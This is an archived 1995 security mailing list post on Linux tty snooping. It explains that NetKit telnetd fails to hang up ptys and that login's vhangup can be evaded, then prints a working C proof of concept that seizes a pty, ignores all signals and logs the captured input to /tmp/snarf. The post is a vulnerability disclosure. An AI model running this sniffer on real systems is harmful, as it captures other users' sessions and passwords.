[prev in list] [next in list] [prev in thread] [next in thread] 

List:       best-of-security
Subject:    BoS: linux tty surfing
From:       Julian Assange <proff () suburbia ! net>
Date:       1995-09-26 13:07:49
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----


Hi all,

I've done some more testing on this, and got the following results
with 1.2.10 (yeah, I'm not really on the bleeding edge):

        * telnetd as of NetKit-0.5 does not protect you from anyone
          snooping on your pty. I guess we know that by now.
          There's some code in sys_term.c that does a vhangup on the
          pty, but it's commented out for Linux. The comment says that
          this appears to be buggy

        * Using login from util-linux-2.2 helps a bit. If you do a
          cat /dev/ttyp0, it will terminate once login is executed by
          telnetd. That's because login *does* do a vhangup.

        * Unfortunately, this is not the end of it. I experimented
          a little, and found that a program that ignores all signals
          *and* makes the pty its controlling tty will happily live on,
          and is still able to read data from it. I'm including it
          below.

          What I do not understand is why this does not make telnetd
          fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
          this stuff may be able to shed some light on this (Ted?).

Olaf
- --
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
             For my PGP public key, finger okir@brewhq.swb.de.
- ------------------------------------------------------------------
/*
 * simple test program for. Not my usual standard of coding...
 */
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/fcntl.h>

int
main(int argc, char **argv)
{
        char    buffer[256];
        FILE    *fp;
        int     fd, i, n;

        for (i = 0; i < 256; i++)
                close(i);
        setsid();
        if ((fd = open(argv[1], O_RDWR)) < 0) {
                perror("open");
                return 2;
        }
        if (ioctl(fd, TIOCSCTTY, NULL) < 0)
                perror("ioctl");
        if ((fp = fopen("/tmp/snarf", "w")) == NULL)
                return 2;
        for (i = 0; i < 32; i++)
                signal(i, SIG_IGN);
        while ((n = read(fd, buffer, 255)) > 0) {
                buffer[n] = 0;
                fprintf(fp, "got %s\n", buffer);
        }
        perror("read");
        return 2;
}

--


did I say, "dumb."

[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic